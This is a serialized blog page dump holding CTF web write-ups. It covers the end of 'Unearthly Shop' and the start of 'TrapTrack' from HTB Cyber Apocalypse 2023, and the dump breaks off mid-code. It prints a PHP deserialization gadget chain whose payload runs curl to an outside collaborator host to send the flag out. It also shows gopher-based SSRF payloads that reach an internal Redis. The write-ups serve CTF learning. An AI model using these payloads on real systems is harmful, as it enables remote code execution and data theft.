38,"value":5676},{"type":33,"tag":47,"props":43175,"children":43176},{},[43177],{"type":38,"value":43178},"So if we pass this string:",{"type":33,"tag":114,"props":43180,"children":43181},{},[43182],{"type":33,"tag":119,"props":43183,"children":43185},{"code":43184},"www_frontend_vendor_autoload\n",[43186],{"type":33,"tag":105,"props":43187,"children":43188},{"__ignoreMap":8},[43189],{"type":38,"value":43184},{"type":33,"tag":47,"props":43191,"children":43192},{},[43193],{"type":38,"value":43194},"The function will change our string to this:",{"type":33,"tag":114,"props":43196,"children":43197},{},[43198],{"type":33,"tag":119,"props":43199,"children":43201},{"code":43200},"/www/frontend/vendor/autoload\n",[43202],{"type":33,"tag":105,"props":43203,"children":43204},{"__ignoreMap":8},[43205],{"type":38,"value":43200},{"type":33,"tag":47,"props":43207,"children":43208},{},[43209],{"type":38,"value":43210},"We add a var_dump before the require, and after the unserialize, for debugging purposes.",{"type":33,"tag":47,"props":43212,"children":43213},{},[43214],{"type":38,"value":43215},"We sumbit this serialized string:",{"type":33,"tag":114,"props":43217,"children":43218},{},[43219],{"type":33,"tag":119,"props":43220,"children":43222},{"code":43221},"O:28:\"www_frontend_vendor_autoload\":0:{}\n",[43223],{"type":33,"tag":105,"props":43224,"children":43225},{"__ignoreMap":8},[43226],{"type":38,"value":43221},{"type":33,"tag":47,"props":43228,"children":43229},{},[43230,43232],{"type":38,"value":43231},"We can see this output when we submit the login form:\n",{"type":33,"tag":32400,"props":43233,"children":43235},{"width":40587,"src":43234},"https://user-images.githubusercontent.com/28403617/227588741-a9c20422-e49d-41f1-ae03-485ef75179af.png",[],{"type":33,"tag":47,"props":43237,"children":43238},{},[43239],{"type":33,"tag":2302,"props":43240,"children":43241},{},[43242],{"type":38,"value":43243},"What is the __PHP_Incomplete_Class object 
?",{"type":33,"tag":47,"props":43245,"children":43246},{},[43247],{"type":38,"value":43248},"The unserialize tries to load the class with name \"www_frontend_vendor_autoload\", but it doesn't exist. So he go to the spl_autoload_register function.\nAnd replace all '_' by '/' and adds a / at the beginning of the string.\nThen it include the file /www/frontend/vendor/autoload.php. But the class with the name www_frontend_vendor_autoload still not exists.",{"type":33,"tag":47,"props":43250,"children":43251},{},[43252],{"type":38,"value":43253},"So it's because we have __PHP_Incomplete_Class object when we try to print the deserialized class. This __PHP_Incomplete_Class do not stop the execution of the script, so we can add many more element in the serialized string it will be executed.",{"type":33,"tag":40,"props":43255,"children":43257},{"id":43256},"php-gadgets-part-2",[43258],{"type":38,"value":43259},"PHP Gadgets part 2",{"type":33,"tag":47,"props":43261,"children":43262},{},[43263],{"type":38,"value":43264},"Now we are certain that the autoload file from frontend is loaded, we know that the frontend vendor directory is now accessible via the backend folder. Now we have all the elements to craft our final payload with phpggc that will execute commands during deserialization.",{"type":33,"tag":47,"props":43266,"children":43267},{},[43268],{"type":38,"value":43269},"We need to have an array containing two elements:",{"type":33,"tag":47,"props":43271,"children":43272},{},[43273],{"type":38,"value":43274},"The first of which will include the autoload.php script.",{"type":33,"tag":114,"props":43276,"children":43277},{},[43278],{"type":33,"tag":119,"props":43279,"children":43280},{"code":43221},[43281],{"type":33,"tag":105,"props":43282,"children":43283},{"__ignoreMap":8},[43284],{"type":38,"value":43221},{"type":33,"tag":47,"props":43286,"children":43287},{},[43288,43290,43295],{"type":38,"value":43289},"The second it's our phpggc payload. 
From ",{"type":33,"tag":2302,"props":43291,"children":43292},{},[43293],{"type":38,"value":43294},"Monolog/RCE1",{"type":38,"value":43296}," gadget.",{"type":33,"tag":114,"props":43298,"children":43299},{},[43300],{"type":33,"tag":119,"props":43301,"children":43303},{"code":43302},"O:32:\"MonologHandlerSyslogUdpHandler\":1:{s:6:\"socket\";O:29:\"MonologHandlerBufferHandler\":7:{s:7:\"handler\";r:4;s:10:\"bufferSize\";i:-1;s:6:\"buffer\";a:1:{i:0;a:2:{i:0;s:62:\"curl e8nxzx9mnynbf74h1hcofv6i0964uvik.oastify.com/$(/readflag)\";s:5:\"level\";N;}}s:5:\"level\";N;s:11:\"initialized\";b:1;s:11:\"bufferLimit\";i:-1;s:10:\"processors\";a:2:{i:0;s:7:\"current\";i:1;s:6:\"system\";}}}\n",[43304],{"type":33,"tag":105,"props":43305,"children":43306},{"__ignoreMap":8},[43307],{"type":38,"value":43302},{"type":33,"tag":47,"props":43309,"children":43310},{},[43311],{"type":38,"value":43312},"When we assemble these two elements, we get this payload:",{"type":33,"tag":114,"props":43314,"children":43315},{},[43316],{"type":33,"tag":119,"props":43317,"children":43319},{"code":43318},"a:2:{i:0;O:28:\\\"www_frontend_vendor_autoload\\\":0:{}i:1;O:32:\\\"Monolog\\\\Handler\\\\SyslogUdpHandler\\\":1:{s:6:\\\"socket\\\";O:29:\\\"Monolog\\\\Handler\\\\BufferHandler\\\":7:{s:7:\\\"handler\\\";r:4;s:10:\\\"bufferSize\\\";i:-1;s:6:\\\"buffer\\\";a:1:{i:0;a:2:{i:0;s:62:\\\"curl e8nxzx9mnynbf74h1hcofv6i0964uvik.oastify.com/$(/readflag)\\\";s:5:\\\"level\\\";N;}}s:5:\\\"level\\\";N;s:11:\\\"initialized\\\";b:1;s:11:\\\"bufferLimit\\\";i:-1;s:10:\\\"processors\\\";a:2:{i:0;s:7:\\\"current\\\";i:1;s:6:\\\"system\\\";}}}}\n",[43320],{"type":33,"tag":105,"props":43321,"children":43322},{"__ignoreMap":8},[43323],{"type":38,"value":43318},{"type":33,"tag":47,"props":43325,"children":43326},{},[43327],{"type":38,"value":43328},"We submit this payload to modify the access field of the user admin, and we perform the login to execute our payload from deserialization. 
And voila, we have the flag.",{"type":33,"tag":75,"props":43330,"children":43332},{"imgSrc":43331},"https://user-images.githubusercontent.com/28403617/227621371-87fe5a93-c01c-4b9a-b7ec-dbb152d5a8c5.png",[],{"type":33,"tag":5227,"props":43334,"children":43335},{},[43336],{"type":38,"value":5231},{"title":8,"searchDepth":362,"depth":131,"links":43338},[43339,43340,43341,43342,43343,43344,43345],{"id":42,"depth":362,"text":45},{"id":22881,"depth":362,"text":22884},{"id":40592,"depth":362,"text":40595},{"id":41327,"depth":362,"text":41330},{"id":42282,"depth":362,"text":42285},{"id":42313,"depth":362,"text":42316},{"id":43256,"depth":362,"text":43259},"content:writeups:unearthly-shop.md","writeups/unearthly-shop.md","writeups/unearthly-shop",{"_path":43350,"_dir":6,"_draft":7,"_partial":7,"_locale":8,"title":43351,"description":8,"head":43352,"body":43369,"_type":5240,"_id":45385,"_source":5242,"_file":45386,"_stem":45387,"_extension":5245},"/writeups/traptrack","TrapTrack",{"title":43351,"description":43353,"keywords":43354,"slug":43355,"image":40198,"date":43356,"meta":43357},"TrapTrack challenge, was a hard web challenge from HTB cyber apocalypse. 
It was about SSRF, python unpickle and redis.","web,redis,unpickle,ssrf","traptrack","2023-03-19",[43358,43359,43360,43361,43362,43364,43365,43367],{"og:image":40198},{"og:title":43351},{"og:description":43353},{"og:type":21},{"og:url":43363},"https://owalid.com/traptrack",{"description":43353},{"title":43366},"TrapTrack writeup",{"keywords":43368},"web,redis,unpickle,ssrf,htb,ctf",{"type":30,"children":43370,"toc":45378},[43371,43375,43379,43384,43389,43405,43409,43413,43418,43436,43448,43452,43456,43461,43497,43503,43508,43929,43943,43954,43958,43969,43974,43980,43988,43998,44003,44014,44019,44024,44035,44040,44051,44056,44067,44072,44077,44088,44093,44107,44111,44116,44121,44442,44447,44458,44463,44682,44687,44698,44731,44736,44747,44752,44763,44768,44774,44795,44979,44991,44996,45001,45006,45011,45319,45330,45335,45346,45357,45370,45374],{"type":33,"tag":34,"props":43372,"children":43373},{"id":43355},[43374],{"type":38,"value":43351},{"type":33,"tag":40,"props":43376,"children":43377},{"id":42},[43378],{"type":38,"value":45},{"type":33,"tag":47,"props":43380,"children":43381},{},[43382],{"type":38,"value":43383},"TrapTrack was a web hard challenge from HTB cyber apocalypse 2023.",{"type":33,"tag":47,"props":43385,"children":43386},{},[43387],{"type":38,"value":43388},"This challenge is in white box, meaning we have access to the source code of the 
website.",{"type":33,"tag":47,"props":43390,"children":43391},{},[43392,43393,43398,43399,43404],{"type":38,"value":40237},{"type":33,"tag":105,"props":43394,"children":43396},{"className":43395},[],[43397],{"type":38,"value":40243},{"type":38,"value":40245},{"type":33,"tag":105,"props":43400,"children":43402},{"className":43401},[],[43403],{"type":38,"value":5294},{"type":38,"value":40252},{"type":33,"tag":47,"props":43406,"children":43407},{},[43408],{"type":38,"value":40257},{"type":33,"tag":40,"props":43410,"children":43411},{"id":22881},[43412],{"type":38,"value":22884},{"type":33,"tag":47,"props":43414,"children":43415},{},[43416],{"type":38,"value":43417},"The application has three services: a Flask web service, a SQLite database, and a Redis cache service.",{"type":33,"tag":239,"props":43419,"children":43420},{},[43421,43426,43431],{"type":33,"tag":243,"props":43422,"children":43423},{},[43424],{"type":38,"value":43425},"The web service has a login page and a page for entering a URL to check if it responds properly.",{"type":33,"tag":243,"props":43427,"children":43428},{},[43429],{"type":38,"value":43430},"SQLite is used to store information about URLs and users.",{"type":33,"tag":243,"props":43432,"children":43433},{},[43434],{"type":38,"value":43435},"Redis is used to cache the list of \"jobs\" corresponding to a request that needs to be performed in the future or not, as well as to store its status.",{"type":33,"tag":47,"props":43437,"children":43438},{},[43439,43441,43447],{"type":38,"value":43440},"We have the user admin's credentials, which are: 
",{"type":33,"tag":105,"props":43442,"children":43444},{"className":43443},[],[43445],{"type":38,"value":43446},"admin:admin",{"type":38,"value":215},{"type":33,"tag":32400,"props":43449,"children":43451},{"width":40587,"src":43450},"https://user-images.githubusercontent.com/28403617/227371182-a29df4a9-c5c5-4405-a7d9-af679789ff2a.png",[],{"type":33,"tag":32400,"props":43453,"children":43455},{"width":40587,"src":43454},"https://user-images.githubusercontent.com/28403617/227371190-7f325e53-60cf-41ed-aed1-35906d13cdad.png",[],{"type":33,"tag":47,"props":43457,"children":43458},{},[43459],{"type":38,"value":43460},"On the server, we have two interesting routes:",{"type":33,"tag":239,"props":43462,"children":43463},{},[43464,43481],{"type":33,"tag":243,"props":43465,"children":43466},{},[43467,43471,43473,43479],{"type":33,"tag":128,"props":43468,"children":43469},{},[43470],{"type":38,"value":1406},{"type":38,"value":43472}," ",{"type":33,"tag":105,"props":43474,"children":43476},{"className":43475},[],[43477],{"type":38,"value":43478},"/track/add",{"type":38,"value":43480}," which allows adding a new URL to call.",{"type":33,"tag":243,"props":43482,"children":43483},{},[43484,43488,43489,43495],{"type":33,"tag":128,"props":43485,"children":43486},{},[43487],{"type":38,"value":29696},{"type":38,"value":43472},{"type":33,"tag":105,"props":43490,"children":43492},{"className":43491},[],[43493],{"type":38,"value":43494},"/tracks/\u003Cint:job_id>/status",{"type":38,"value":43496}," which allows verifying the state of the URL that was called.",{"type":33,"tag":40,"props":43498,"children":43500},{"id":43499},"ssrf",[43501],{"type":38,"value":43502},"SSRF ?",{"type":33,"tag":47,"props":43504,"children":43505},{},[43506],{"type":38,"value":43507},"The URL addition part is located in the file healthcheck.py, and here is the 
code:",{"type":33,"tag":114,"props":43509,"children":43510},{"lang":10227},[43511],{"type":33,"tag":119,"props":43512,"children":43514},{"code":43513,"language":10227,"meta":8,"className":10231,"style":8},"import pycurl\n\ndef request(url):\n    response = False\n    try:\n        c = pycurl.Curl()\n        c.setopt(c.URL, url)\n        c.setopt(c.TIMEOUT, 5)\n        c.setopt(c.VERBOSE, True)\n        c.setopt(c.FOLLOWLOCATION, True)\n\n        response = c.perform_rb().decode('utf-8', errors='ignore')\n        c.close()\n    finally:\n        return response\n",[43515],{"type":33,"tag":105,"props":43516,"children":43517},{"__ignoreMap":8},[43518,43530,43537,43560,43577,43588,43618,43664,43709,43754,43798,43805,43886,43905,43917],{"type":33,"tag":128,"props":43519,"children":43520},{"class":130,"line":131},[43521,43525],{"type":33,"tag":128,"props":43522,"children":43523},{"style":1576},[43524],{"type":38,"value":10244},{"type":33,"tag":128,"props":43526,"children":43527},{"style":323},[43528],{"type":38,"value":43529}," 
pycurl\n",{"type":33,"tag":128,"props":43531,"children":43532},{"class":130,"line":362},[43533],{"type":33,"tag":128,"props":43534,"children":43535},{"emptyLinePlaceholder":896},[43536],{"type":38,"value":899},{"type":33,"tag":128,"props":43538,"children":43539},{"class":130,"line":403},[43540,43544,43548,43552,43556],{"type":33,"tag":128,"props":43541,"children":43542},{"style":300},[43543],{"type":38,"value":10402},{"type":33,"tag":128,"props":43545,"children":43546},{"style":135},[43547],{"type":38,"value":14050},{"type":33,"tag":128,"props":43549,"children":43550},{"style":312},[43551],{"type":38,"value":5566},{"type":33,"tag":128,"props":43553,"children":43554},{"style":323},[43555],{"type":38,"value":13952},{"type":33,"tag":128,"props":43557,"children":43558},{"style":312},[43559],{"type":38,"value":10497},{"type":33,"tag":128,"props":43561,"children":43562},{"class":130,"line":739},[43563,43568,43572],{"type":33,"tag":128,"props":43564,"children":43565},{"style":323},[43566],{"type":38,"value":43567},"    response ",{"type":33,"tag":128,"props":43569,"children":43570},{"style":312},[43571],{"type":38,"value":315},{"type":33,"tag":128,"props":43573,"children":43574},{"style":1576},[43575],{"type":38,"value":43576}," False\n",{"type":33,"tag":128,"props":43578,"children":43579},{"class":130,"line":765},[43580,43584],{"type":33,"tag":128,"props":43581,"children":43582},{"style":1576},[43583],{"type":38,"value":16034},{"type":33,"tag":128,"props":43585,"children":43586},{"style":312},[43587],{"type":38,"value":5318},{"type":33,"tag":128,"props":43589,"children":43590},{"class":130,"line":804},[43591,43596,43600,43605,43609,43614],{"type":33,"tag":128,"props":43592,"children":43593},{"style":323},[43594],{"type":38,"value":43595},"        c ",{"type":33,"tag":128,"props":43597,"children":43598},{"style":312},[43599],{"type":38,"value":315},{"type":33,"tag":128,"props":43601,"children":43602},{"style":323},[43603],{"type":38,"value":43604}," 
pycurl",{"type":33,"tag":128,"props":43606,"children":43607},{"style":312},[43608],{"type":38,"value":215},{"type":33,"tag":128,"props":43610,"children":43611},{"style":323},[43612],{"type":38,"value":43613},"Curl",{"type":33,"tag":128,"props":43615,"children":43616},{"style":312},[43617],{"type":38,"value":7857},{"type":33,"tag":128,"props":43619,"children":43620},{"class":130,"line":839},[43621,43626,43630,43635,43639,43643,43647,43652,43656,43660],{"type":33,"tag":128,"props":43622,"children":43623},{"style":323},[43624],{"type":38,"value":43625},"        c",{"type":33,"tag":128,"props":43627,"children":43628},{"style":312},[43629],{"type":38,"value":215},{"type":33,"tag":128,"props":43631,"children":43632},{"style":323},[43633],{"type":38,"value":43634},"setopt",{"type":33,"tag":128,"props":43636,"children":43637},{"style":312},[43638],{"type":38,"value":5566},{"type":33,"tag":128,"props":43640,"children":43641},{"style":323},[43642],{"type":38,"value":330},{"type":33,"tag":128,"props":43644,"children":43645},{"style":312},[43646],{"type":38,"value":215},{"type":33,"tag":128,"props":43648,"children":43649},{"style":151},[43650],{"type":38,"value":43651},"URL",{"type":33,"tag":128,"props":43653,"children":43654},{"style":312},[43655],{"type":38,"value":5584},{"type":33,"tag":128,"props":43657,"children":43658},{"style":323},[43659],{"type":38,"value":15126},{"type":33,"tag":128,"props":43661,"children":43662},{"style":312},[43663],{"type":38,"value":2427},{"type":33,"tag":128,"props":43665,"children":43666},{"class":130,"line":848},[43667,43671,43675,43679,43683,43687,43691,43696,43700,43705],{"type":33,"tag":128,"props":43668,"children":43669},{"style":323},[43670],{"type":38,"value":43625},{"type":33,"tag":128,"props":43672,"children":43673},{"style":312},[43674],{"type":38,"value":215},{"type":33,"tag":128,"props":43676,"children":43677},{"style":323},[43678],{"type":38,"value":43634},{"type":33,"tag":128,"props":43680,"children":43681},{"style":312},[43682],{
"type":38,"value":5566},{"type":33,"tag":128,"props":43684,"children":43685},{"style":323},[43686],{"type":38,"value":330},{"type":33,"tag":128,"props":43688,"children":43689},{"style":312},[43690],{"type":38,"value":215},{"type":33,"tag":128,"props":43692,"children":43693},{"style":151},[43694],{"type":38,"value":43695},"TIMEOUT",{"type":33,"tag":128,"props":43697,"children":43698},{"style":312},[43699],{"type":38,"value":5584},{"type":33,"tag":128,"props":43701,"children":43702},{"style":523},[43703],{"type":38,"value":43704}," 5",{"type":33,"tag":128,"props":43706,"children":43707},{"style":312},[43708],{"type":38,"value":2427},{"type":33,"tag":128,"props":43710,"children":43711},{"class":130,"line":976},[43712,43716,43720,43724,43728,43732,43736,43741,43745,43750],{"type":33,"tag":128,"props":43713,"children":43714},{"style":323},[43715],{"type":38,"value":43625},{"type":33,"tag":128,"props":43717,"children":43718},{"style":312},[43719],{"type":38,"value":215},{"type":33,"tag":128,"props":43721,"children":43722},{"style":323},[43723],{"type":38,"value":43634},{"type":33,"tag":128,"props":43725,"children":43726},{"style":312},[43727],{"type":38,"value":5566},{"type":33,"tag":128,"props":43729,"children":43730},{"style":323},[43731],{"type":38,"value":330},{"type":33,"tag":128,"props":43733,"children":43734},{"style":312},[43735],{"type":38,"value":215},{"type":33,"tag":128,"props":43737,"children":43738},{"style":151},[43739],{"type":38,"value":43740},"VERBOSE",{"type":33,"tag":128,"props":43742,"children":43743},{"style":312},[43744],{"type":38,"value":5584},{"type":33,"tag":128,"props":43746,"children":43747},{"style":1576},[43748],{"type":38,"value":43749}," 
True",{"type":33,"tag":128,"props":43751,"children":43752},{"style":312},[43753],{"type":38,"value":2427},{"type":33,"tag":128,"props":43755,"children":43756},{"class":130,"line":988},[43757,43761,43765,43769,43773,43777,43781,43786,43790,43794],{"type":33,"tag":128,"props":43758,"children":43759},{"style":323},[43760],{"type":38,"value":43625},{"type":33,"tag":128,"props":43762,"children":43763},{"style":312},[43764],{"type":38,"value":215},{"type":33,"tag":128,"props":43766,"children":43767},{"style":323},[43768],{"type":38,"value":43634},{"type":33,"tag":128,"props":43770,"children":43771},{"style":312},[43772],{"type":38,"value":5566},{"type":33,"tag":128,"props":43774,"children":43775},{"style":323},[43776],{"type":38,"value":330},{"type":33,"tag":128,"props":43778,"children":43779},{"style":312},[43780],{"type":38,"value":215},{"type":33,"tag":128,"props":43782,"children":43783},{"style":151},[43784],{"type":38,"value":43785},"FOLLOWLOCATION",{"type":33,"tag":128,"props":43787,"children":43788},{"style":312},[43789],{"type":38,"value":5584},{"type":33,"tag":128,"props":43791,"children":43792},{"style":1576},[43793],{"type":38,"value":43749},{"type":33,"tag":128,"props":43795,"children":43796},{"style":312},[43797],{"type":38,"value":2427},{"type":33,"tag":128,"props":43799,"children":43800},{"class":130,"line":1001},[43801],{"type":33,"tag":128,"props":43802,"children":43803},{"emptyLinePlaceholder":896},[43804],{"type":38,"value":899},{"type":33,"tag":128,"props":43806,"children":43807},{"class":130,"line":1014},[43808,43813,43817,43822,43826,43831,43836,43840,43844,43848,43852,43856,43860,43865,43869,43873,43878,43882],{"type":33,"tag":128,"props":43809,"children":43810},{"style":323},[43811],{"type":38,"value":43812},"        response ",{"type":33,"tag":128,"props":43814,"children":43815},{"style":312},[43816],{"type":38,"value":315},{"type":33,"tag":128,"props":43818,"children":43819},{"style":323},[43820],{"type":38,"value":43821}," 
c",{"type":33,"tag":128,"props":43823,"children":43824},{"style":312},[43825],{"type":38,"value":215},{"type":33,"tag":128,"props":43827,"children":43828},{"style":323},[43829],{"type":38,"value":43830},"perform_rb",{"type":33,"tag":128,"props":43832,"children":43833},{"style":312},[43834],{"type":38,"value":43835},"().",{"type":33,"tag":128,"props":43837,"children":43838},{"style":323},[43839],{"type":38,"value":10820},{"type":33,"tag":128,"props":43841,"children":43842},{"style":312},[43843],{"type":38,"value":5566},{"type":33,"tag":128,"props":43845,"children":43846},{"style":676},[43847],{"type":38,"value":6040},{"type":33,"tag":128,"props":43849,"children":43850},{"style":140},[43851],{"type":38,"value":10833},{"type":33,"tag":128,"props":43853,"children":43854},{"style":676},[43855],{"type":38,"value":6040},{"type":33,"tag":128,"props":43857,"children":43858},{"style":312},[43859],{"type":38,"value":5584},{"type":33,"tag":128,"props":43861,"children":43862},{"style":306},[43863],{"type":38,"value":43864}," 
errors",{"type":33,"tag":128,"props":43866,"children":43867},{"style":312},[43868],{"type":38,"value":315},{"type":33,"tag":128,"props":43870,"children":43871},{"style":676},[43872],{"type":38,"value":6040},{"type":33,"tag":128,"props":43874,"children":43875},{"style":140},[43876],{"type":38,"value":43877},"ignore",{"type":33,"tag":128,"props":43879,"children":43880},{"style":676},[43881],{"type":38,"value":6040},{"type":33,"tag":128,"props":43883,"children":43884},{"style":312},[43885],{"type":38,"value":2427},{"type":33,"tag":128,"props":43887,"children":43888},{"class":130,"line":1026},[43889,43893,43897,43901],{"type":33,"tag":128,"props":43890,"children":43891},{"style":323},[43892],{"type":38,"value":43625},{"type":33,"tag":128,"props":43894,"children":43895},{"style":312},[43896],{"type":38,"value":215},{"type":33,"tag":128,"props":43898,"children":43899},{"style":323},[43900],{"type":38,"value":23692},{"type":33,"tag":128,"props":43902,"children":43903},{"style":312},[43904],{"type":38,"value":7857},{"type":33,"tag":128,"props":43906,"children":43907},{"class":130,"line":1038},[43908,43913],{"type":33,"tag":128,"props":43909,"children":43910},{"style":1576},[43911],{"type":38,"value":43912},"    finally",{"type":33,"tag":128,"props":43914,"children":43915},{"style":312},[43916],{"type":38,"value":5318},{"type":33,"tag":128,"props":43918,"children":43919},{"class":130,"line":1051},[43920,43924],{"type":33,"tag":128,"props":43921,"children":43922},{"style":1576},[43923],{"type":38,"value":13615},{"type":33,"tag":128,"props":43925,"children":43926},{"style":323},[43927],{"type":38,"value":43928}," response\n",{"type":33,"tag":47,"props":43930,"children":43931},{},[43932,43934,43941],{"type":38,"value":43933},"We can test the URL call, with ",{"type":33,"tag":53,"props":43935,"children":43938},{"href":43936,"rel":43937},"https://github.com/owalid/express-sec/",[57],[43939],{"type":38,"value":43940},"express-sec",{"type":38,"value":43942}," and Ngrok. 
If we enter a URL that belongs to us, we can quickly see that the site sends us an HTTP request.",{"type":33,"tag":114,"props":43944,"children":43945},{},[43946],{"type":33,"tag":119,"props":43947,"children":43949},{"code":43948},"POST /api/tracks/add HTTP/1.1\nHost: localhost:1337\nReferer: http://localhost:1337/admin/\nContent-Type: application/json\nContent-Length: 66\nOrigin: http://localhost:1337\nConnection: close\nCookie: session=8e3c330d-3f69-475a-9924-9638f040b30e\n\n{\"trapName\":\"test\",\"trapURL\":\"http://b536-91-69-133-214.ngrok.io\"}\n",[43950],{"type":33,"tag":105,"props":43951,"children":43952},{"__ignoreMap":8},[43953],{"type":38,"value":43948},{"type":33,"tag":32400,"props":43955,"children":43957},{"width":40587,"src":43956},"https://user-images.githubusercontent.com/28403617/227356280-ac9d4799-e53e-4dea-9a6c-9998066ced0f.png",[],{"type":33,"tag":47,"props":43959,"children":43960},{},[43961,43963,43968],{"type":38,"value":43962},"If you pay attention to the payload, you will realize that we specify the protocol, in our case ",{"type":33,"tag":105,"props":43964,"children":43966},{"className":43965},[],[43967],{"type":38,"value":1561},{"type":38,"value":215},{"type":33,"tag":47,"props":43970,"children":43971},{},[43972],{"type":38,"value":43973},"We now know that the application contains a Redis service, which could be accessed via the Gopher protocol to perform requests, modify keys, retrieve keys, etc.",{"type":33,"tag":40,"props":43975,"children":43977},{"id":43976},"call-redis-with-gopher-protocol",[43978],{"type":38,"value":43979},"Call redis with gopher protocol",{"type":33,"tag":22891,"props":43981,"children":43982},{},[43983],{"type":33,"tag":47,"props":43984,"children":43985},{},[43986],{"type":38,"value":43987},"\"The Gopher protocol is an early protocol for distributing, searching, and retrieving documents over the internet. 
It was developed in the early 1990s at the University of Minnesota as an alternative to the World Wide Web (WWW), which was still in its early stages at the time. [...] The Gopher protocol operates by organizing information into a hierarchical structure, with directories and subdirectories that contain files, similar to a file system on a computer. This allows users to easily navigate and search for information, as well as retrieve and download files.\"",{"type":33,"tag":47,"props":43989,"children":43990},{},[43991],{"type":33,"tag":53,"props":43992,"children":43995},{"href":43993,"rel":43994},"https://en.wikipedia.org/wiki/Gopher_(protocol)",[57],[43996],{"type":38,"value":43997},"source",{"type":33,"tag":47,"props":43999,"children":44000},{},[44001],{"type":38,"value":44002},"An example of utilisation:",{"type":33,"tag":114,"props":44004,"children":44005},{},[44006],{"type":33,"tag":119,"props":44007,"children":44009},{"code":44008},"gopher://\u003CURL>:\u003CPORT>/_\u003CURL_ENCODED_COMMAND>%0A\n",[44010],{"type":33,"tag":105,"props":44011,"children":44012},{"__ignoreMap":8},[44013],{"type":38,"value":44008},{"type":33,"tag":47,"props":44015,"children":44016},{},[44017],{"type":38,"value":44018},"If we try to transmit a request to get information from the redis server, using the following redis request, we will have a proof that the python service is able to call redis.",{"type":33,"tag":47,"props":44020,"children":44021},{},[44022],{"type":38,"value":44023},"Our raw payload in redis console will be:",{"type":33,"tag":114,"props":44025,"children":44026},{},[44027],{"type":33,"tag":119,"props":44028,"children":44030},{"code":44029},"redis> INFO\nquit\n",[44031],{"type":33,"tag":105,"props":44032,"children":44033},{"__ignoreMap":8},[44034],{"type":38,"value":44029},{"type":33,"tag":47,"props":44036,"children":44037},{},[44038],{"type":38,"value":44039},"We need to encode this as url 
encode:",{"type":33,"tag":114,"props":44041,"children":44042},{},[44043],{"type":33,"tag":119,"props":44044,"children":44046},{"code":44045},"INFO%0D%0Aquit%0D%0A\n",[44047],{"type":33,"tag":105,"props":44048,"children":44049},{"__ignoreMap":8},[44050],{"type":38,"value":44045},{"type":33,"tag":47,"props":44052,"children":44053},{},[44054],{"type":38,"value":44055},"Our final payload to get info will be:",{"type":33,"tag":114,"props":44057,"children":44058},{},[44059],{"type":33,"tag":119,"props":44060,"children":44062},{"code":44061},"{\"trapName\":\"hello\",\"trapURL\":\"gopher://127.0.0.1:6379/_%0D%0AINFO%0D%0Aquit%0D%0A\"}\n",[44063],{"type":33,"tag":105,"props":44064,"children":44065},{"__ignoreMap":8},[44066],{"type":38,"value":44061},{"type":33,"tag":47,"props":44068,"children":44069},{},[44070],{"type":38,"value":44071},"If we place some debug prints in the return of pycurl requests in the code base, we can see that the python service is able to call redis.",{"type":33,"tag":47,"props":44073,"children":44074},{},[44075],{"type":38,"value":44076},"And we have the redis info:",{"type":33,"tag":114,"props":44078,"children":44079},{},[44080],{"type":33,"tag":119,"props":44081,"children":44083},{"code":44082},"$3290\n# Server\nredis_version:5.0.14\nredis_git_sha1:00000000\nredis_git_dirty:0\nredis_build_id:17cc4bf7c682c268\nredis_mode:standalone\nos:Linux 5.10.76-linuxkit x86_64\narch_bits:64\n.......\n# Cluster\ncluster_enabled:0\n\n# Keyspace\ndb0:keys=2,expires=0,avg_ttl=0\n\n+OK\n",[44084],{"type":33,"tag":105,"props":44085,"children":44086},{"__ignoreMap":8},[44087],{"type":38,"value":44082},{"type":33,"tag":47,"props":44089,"children":44090},{},[44091],{"type":38,"value":44092},"At this point, we know that it's possible to contact the Redis service via an SSRF vulnerability.",{"type":33,"tag":47,"props":44094,"children":44095},{},[44096,44098,44105],{"type":38,"value":44097},"Our goal now is to pollute the Redis keys. 
If we take a look at Redis, we can see that the Python client uses hash keys. We can see in the ",{"type":33,"tag":53,"props":44099,"children":44102},{"href":44100,"rel":44101},"https://redis.io/commands/hset/",[57],[44103],{"type":38,"value":44104},"Redis documentation",{"type":38,"value":44106}," how to interact with this type of keys.",{"type":33,"tag":32400,"props":44108,"children":44110},{"width":40587,"src":44109},"https://user-images.githubusercontent.com/28403617/227360017-52291945-f235-4643-b4e4-0b9f78fcf0f7.png",[],{"type":33,"tag":47,"props":44112,"children":44113},{},[44114],{"type":38,"value":44115},"If we take an example of a Redis query in the code, we can easily guess the values to use in our malicious query.",{"type":33,"tag":47,"props":44117,"children":44118},{},[44119],{"type":38,"value":44120},"Here is an example of a Redis query in the code:",{"type":33,"tag":114,"props":44122,"children":44123},{"lang":10227},[44124],{"type":33,"tag":119,"props":44125,"children":44127},{"code":44126,"language":10227,"meta":8,"className":10231,"style":8},"config = {\n    'REDIS_HOST' : '127.0.0.1',\n    'REDIS_PORT' : 6379,\n    'REDIS_JOBS' : 'jobs',\n    'REDIS_QUEUE' : 'jobqueue',\n    'REDIS_NUM_JOBS' : 100\n}\n# ...\nstore.hset(env('REDIS_JOBS'), job['job_id'], base64.b64encode(pickle.dumps(job)))\n",[44128],{"type":33,"tag":105,"props":44129,"children":44130},{"__ignoreMap":8},[44131,44147,44183,44212,44249,44286,44311,44318,44326],{"type":33,"tag":128,"props":44132,"children":44133},{"class":130,"line":131},[44134,44139,44143],{"type":33,"tag":128,"props":44135,"children":44136},{"style":323},[44137],{"type":38,"value":44138},"config 
",{"type":33,"tag":128,"props":44140,"children":44141},{"style":312},[44142],{"type":38,"value":315},{"type":33,"tag":128,"props":44144,"children":44145},{"style":312},[44146],{"type":38,"value":762},{"type":33,"tag":128,"props":44148,"children":44149},{"class":130,"line":362},[44150,44154,44159,44163,44167,44171,44175,44179],{"type":33,"tag":128,"props":44151,"children":44152},{"style":676},[44153],{"type":38,"value":10362},{"type":33,"tag":128,"props":44155,"children":44156},{"style":140},[44157],{"type":38,"value":44158},"REDIS_HOST",{"type":33,"tag":128,"props":44160,"children":44161},{"style":676},[44162],{"type":38,"value":6040},{"type":33,"tag":128,"props":44164,"children":44165},{"style":312},[44166],{"type":38,"value":26220},{"type":33,"tag":128,"props":44168,"children":44169},{"style":676},[44170],{"type":38,"value":6739},{"type":33,"tag":128,"props":44172,"children":44173},{"style":140},[44174],{"type":38,"value":31790},{"type":33,"tag":128,"props":44176,"children":44177},{"style":676},[44178],{"type":38,"value":6040},{"type":33,"tag":128,"props":44180,"children":44181},{"style":312},[44182],{"type":38,"value":693},{"type":33,"tag":128,"props":44184,"children":44185},{"class":130,"line":403},[44186,44190,44195,44199,44203,44208],{"type":33,"tag":128,"props":44187,"children":44188},{"style":676},[44189],{"type":38,"value":10362},{"type":33,"tag":128,"props":44191,"children":44192},{"style":140},[44193],{"type":38,"value":44194},"RE